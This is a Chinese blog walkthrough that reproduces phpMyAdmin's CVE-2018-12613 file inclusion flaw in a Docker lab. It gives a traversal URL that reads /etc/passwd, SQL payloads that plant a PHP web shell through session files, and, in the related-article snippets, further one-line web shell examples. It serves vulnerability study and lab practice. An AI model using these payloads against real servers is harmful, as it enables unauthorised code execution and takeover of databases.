【漏洞复现】phpmyadmin后台任意文件包含(CVE-2018-12613)

最新推荐文章于 2023-09-13 09:13:20 发布
最新推荐文章于 2023-09-13 09:13:20 发布
阅读量777 收藏
点赞数 1
分类专栏: Web攻防 文章标签: 漏洞复现 渗透测试 phpmyadmin CVE-2018-12613
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43968080/article/details/108866721
版权

文章目录

许久没有在CSDN更新博文了,主要是最近在自己搭建博客网站,已经初具形态,之后大部分博文都会发布在自己的博客网站上,少量的会同步在CSDN,小伙伴们可以去那里看我的一些学习分享呦😉

博客传送门:https://www.yyxzz.net
本文传送门:https://www.yyxzz.net/index.php/2020/09/29/58.html

0x00 简述

由于对index.php中包含文件的target参数未作严格的安全校验,导致可以被利用绕过白名单、黑名单校验从而进行本地文件包含,达到GetShell和命令执行的效果。

要想利用该漏洞,攻击者必须经过身份验证,但在这些情况下除外:

  • $ cfg [‘AllowArbitraryServer’] =
    true:攻击者可以指定他已经控制的任何主机,并在phpMyAdmin上执行任意代码
  • $ cfg [‘ServerDefault’] = 0:这会绕过登录并在没有任何身份验证的情况下运行易受攻击的代码

影响版本:

  • Phpmyadmin 4.8.0
  • Phpmyadmin 4.8.0.1
  • Phpmyadmin 4.8.1

0x01 漏洞验证

Docker拉取靶场环境,创建靶场环境

在这里插入图片描述
浏览器访问8080端口,即可进入phpmyadmin界面,因为靶场用的是config方式的身份验证,因此不需要使用账号密码登录

在这里插入图片描述
根据漏洞报告和网上师傅们的复现文章,是在index.php文件处存在本地文件包含漏洞,所以验证代码如下:

http://192.168.11.12:8080/index.php?target=db_sql.php%253f/../../../../../../../../etc/passwd

成功读取passwd文件

在这里插入图片描述
此时可以利用session文件写入phpinfo()木马,首先执行SQL语句:

select '<?php phpinfo() ?>';

然后F12查看此时用户的sessionID,也就是phpmyadmin的Cookie值,此值就是Mysql保存在本地的临时会话文件,使用以下url访问该临时文件,即可执行此前插入的木马语句:

http://192.168.11.12:8080/index.php?target=db_sql.php%253f/../../../../../../../../tmp/sess_8f36723f61b00567f291c3e7218be400

注意:需要将sess_后的内容改为自己当前的Cookie值

在这里插入图片描述

0x02 GetShell

1.利用sesion文件

执行以下SQL命令,同上方法访问临时session文件,即可php命令在网站目录下创建a.php并写入一句话

SELECT `<?php fputs(fopen("a.php","w"),'<?php eval($_POST[a]);?>');?>`;

在这里插入图片描述

蚁剑成功连接:

在这里插入图片描述

可打开虚拟终端和文件系统

在这里插入图片描述

2.利用数据库文件(frm表结构文件)

通过创建表并将字段名定义为一句话木马,随后利用包含访问该文件即可:

在这里插入图片描述
但是因为我在Docker上搭建的环境,Web和Mysql用的2个主机环境,也就是库站分离,所以无法包含数据库文件,但是可以在Mysql虚拟机里看到木马:

在这里插入图片描述

所以和上边session文件一样,只需要将数据库字段名设置为以下语句:

SELECT `<?php fputs(fopen("a.php","w"),'<?php eval($_POST[a]);?>');?>`;

然后包含相应的test.frm文件,即可执行命令在网站目录下创建一个a.php的木马

为了测试,我直接在Web主句目录下写入一个frm文件,然后在phpmyadmin中包含该文件:

最低0.47元/天 解锁文章
KB-野原新之助
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
getshell之Phpmyadmin写日志
MoCoCN的博客
08-30 644
@MoCoCN Phpmyadmin写日志getshell 当初接触渗透测试的时候getshell就会个文件上传,后来随着工作学到的知识越来越多,慢慢的getshell的姿势也慢慢的学到了些,这次给大家分享一个很常见也很基础的getshell的方式。如有什么不严谨的地方,还望大佬指点。 1.准备环境 一台装有Phpstudy(mysql>5.0)的服务器 中国蚁剑 2.开启phpstudy 3.访问服务器phpmyadmin页面 4.弱口令root root登录进去,点击SQL,执行sql语句 查
phpmyadmin文件包含漏洞CVE-2018-12613)
feng的博客
05-04 1122
前言 一个非常经典的漏洞了,以前只是直接拿payload打,还没认真的在本地过,看过漏洞的代码到底是怎么回事,所以今天从github上下载phpmyadmin4.8.1,到vps上然后一波,看一下代码的问题。 漏洞在index.php的第61行: 存在任意文件包含,但是需要进入if才可以。 一层一层的来看,首先target不为空,而且是字符串,这很容易满足,而且不以index开头,而且不在黑名单中: $target_blacklist = array ( 'import.php'
Think.PHP框架漏洞
最新发布
m0_71300782的博客
09-13 958
2.服务器启动先cd到thinkphp文件夹下面的5-rce里面,然后docker-compose up -d 安装环境3.进入浏览器ip地址加8080看见。
phpmyadmin任意文件包含漏洞分析(含演示)
weixin_33883178的博客
02-16 369
0x01 漏洞描述 phpmyadmin是一款应用非常广泛的mysql数据库管理软件,基于PHP开发。 最新的CVE-2014-8959公告中,提到该程序多个版本存在任意文件包含漏洞,影响版本如下: phpMyAdmin 4.0.1 – 4.0.10.6 4.1.1 – 4.1.14.7 4.2.1 – 4.2.12 0x02 补丁分析 看到bobao.360.cn上提到了这个漏洞...
CVE-2018-12613 phpmyadmin文件包含getshell连载(三)
PANDA墨森的博客
06-24 637
这是phpmyadmin系列渗透思路的第三篇文章,前面一篇文章阐述了通过慢查询日志getshell,本文将通过文件包含漏洞展开讨论 原文链接:https://www.cnblogs.com/PANDA-Mosen/p/13164349.html #001 影响版本 Phpmyadmin 4.8.0/4.8.0.1/4.8.1 #002 漏洞验证利用 http://www.xxx.com/index.php?target=db_sql.php%253f/../../../../../../e.
phpmyadmin 远程文件包含漏洞CVE-2018-12613) - tdcoming'blog QQ group 906
08-04
漏洞背景背景介绍phpMyAdmin是一套开源的、基于Web的MySQL数据库管理工具…阅读数 156博文CVE-2018-12613 --- 本地文件包含造成
Phpmyadmin后台代码执行CVE-2016-5734_poc
09-30
Phpmyadmin后台代码执行CVE-2016-5734_poc CVE-2016-5734在exploit-db上也就是 phpMyAdmin 4.6.2 - Authenticated Remote Code Execution ,意即phpMyAdmin认证用户的远程代码执行,根据描述可知受影响的phpMyAdmin...
phpMyAdmin 4.0.1--4.2.12 本地文件包含漏洞(CVE-2014-8959)-附件资源
03-02
phpMyAdmin 4.0.1--4.2.12 本地文件包含漏洞(CVE-2014-8959)-附件资源
CVE-2018-12613 PhpMyadmin后台文件包含分析
热门推荐
3569
06-27 1万+
2018年6月19日,phpmyadmin在最新版本修了一个严重级别的漏洞.描述:一个攻击者可以在服务器上包含(查看和潜在执行)文件漏洞被发。该漏洞来自一部分代码,其中页面在phpMyAdmin中被重定向和加载,以及对白名单页面进行不正确的测试。攻击者必须经过身份验证,但在这些情况下除外:$ cfg ['AllowArbitraryServer'] = true:攻击者可以指定他/她已经控制...
PHP与SQL语句写一句话木马总结
mysteryflower的专栏
10-22 476
一、基础类的一句话--功能仅限于验证漏洞了,实际中非常容易被查出出来: <?php @eval($_GET["code"])?> <?php @system($_POST["cmd"])?> 二、编码的替换的类型: <?php @fputs(fopen(base64_decode('bG9zdC5waHA='),w),base64_decode('PD9wa...
phpmyadmin通过日志文件拿webshell
aiquan9342的博客
03-26 475
该方法非原创。只是给大家分享一下姿势。如果知道得就当习了,不知道得就捣鼓捣鼓。 前提:条件是root用户。 思路:就是利用mysql的一个日志文件。这个日志文件每执行一个sql语句就会将其执行的保存。我们将这个日志文件重命名为我们的shell.php然后执行一条sql带一句话木马的命令。然后执行菜刀连接之! 要先把general log设置为ON 然后将文件修改日志文件名修...
phpMyAdmin 4.8.1后台文件包含漏洞CVE-2018-12613)
qq_45521281的博客
04-27 3294
这篇文章将分享一个phpMyAdmin 4.8.1版本的文件包含漏洞,从配置到原理,再到漏洞进行讲解,更重要的是让大家了解这些真实漏洞背后的知识。 文章目录一.phpMyAdmin二.phpMyAdmin基础用法三.漏洞原理四.phpMyAdmin漏洞 一.phpMyAdmin phpMyAdmin是一种MySQL数据库的管理工具,安装该工具后,即可通过Web形式直接管理MySQL数据,而...
【CVE】CVE-2018-12613:windows phpMyAdmin 本地文件包含造成远程代码执行漏洞
边扯边淡
11-24 884
起序:在做 Web 题遇到的,一下。 一、靶场环境 VMware Workstation 15.5 Pro cn_windows_7_ultimate_with_sp1_x64_dvd_u_677408.iso phpStudy 2018 phpMyAdmin-4.8.1-all-languages 二、漏洞分析 1、本地文件包含 LFI(本地文件包含),是指当服务器开启 allow_url_include 选项时,就可以通过php的某些特性函数 include(),require()和inclu
phpmyadmin 4.8.1 远程文件包含漏洞CVE-2018-12613)
ximo的博客
03-22 963
CVE-2018-12613 简介: phpMyAdmin是一套开源的、基于Web的MySQL数据库管理工具。其index.php中存在一处文件包含逻辑,通过二次编码即可绕过检查,造成远程文件包含漏洞。 搭建环境: 使用docker+vulhub的环境。 过程: 访问: index.php?target=db_sql.php%253f/…/…/…/…/…/…/…/…/etc/passwd 可以查看到文件信息: 说明存在文件包含。 在sql中执行SELECT '<?=phpinfo()?&gt
PhpMyAdmin4.8.1后台文件包含漏洞(CVE-2018-12613)
hclimg的博客
10-30 2298
phpmyadmin是一套开源的、基于Web的MySQL数据库管理工具。其index.php中存在一处文件包含逻辑,通过二次编码即可绕过检查,造成远程文件包含漏洞漏洞环境:基于某平台的在线靶场进行漏洞 过程: 1. 访问网址,是一处phpmyadmin的登录地址首页,通过弱密码可以进入数据库管理界面 2. 根据在网上曝光的CVE-2018-1...
phpmyadmin利用日志文件写入一句话
Websec
07-16 8504
前提: root权限,已经进入了phpmyadmin后台 1、首先进入phpmyadmin后台,查看genelog变量,更改general log和general log file参数,初始设置general log是OFF,我们将其改成ON;general log file我们将其改成我们特定的目录文件,我这里写成D:\phpStudy\WWW\test1.php       2...
phpMyAdmin 4.8.1后台文件包含漏洞Getshell的几种姿势
qq_45521281的博客
04-27 2396
phpmyadmin 4.8.1 远程文件包含漏洞CVE-2018-12613) phpMyAdmin是一套开源的、基于Web的MySQL数据库管理工具。其index.php中存在一处文件包含逻辑, 通过二次编码即可绕过检查,造成远程文件包含漏洞。 受影响版本: phpMyAdmin 4.8.0和4.8.1受到影响。 登陆phpmyadmin后台: 访问 http://192.168.0.13...
Phpmyadmin 后台sql注入漏洞CVE-2020-5504)
锋刃科技的博客
11-29 3374
漏洞概述 在用户帐户页面中发了一个SQL注入漏洞。创建对此页面的查询时,恶意用户可能会注入自定义SQL来代替其自己的用户名。攻击者必须具有有效的MySQL帐户才能访问服务器。 查看补丁 修改了username处,这就是注入点了 影响版本 Phpmyadmin <= 5.00 Phpmyadmin <= 4.94 漏洞 phpmyadmin5.0下载地址 https://files.phpmyadmin.net/phpMyAdmin/5.0.0/phpMyAdm.
CVE-2016-5734
09-04
CVE-2016-5734是一个针对PHPMyAdmin漏洞,该漏洞允许远程攻击者执行任意命令。该漏洞可以通过使用提供的Python脚本来利用,脚本可以在指定的URL上执行特定命令。如果你想进一步了解该漏洞以及如何分析它,可以参考提供的链接。如果你想在本地环境中测试该漏洞,可以下载并安装vulhub,并进入/vulhub/phpmyadmin/CVE-2016-5734目录,然后使用提供的命令启动环境。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* [buuctf [PHPMYADMIN]CVE-2016-5734](https://blog.csdn.net/qq_36241198/article/details/115017777)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] - *2* *3* [CVE-2016-5734 Phpmyadmin后台代码执行漏洞](https://blog.csdn.net/weixin_41924764/article/details/113063083)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值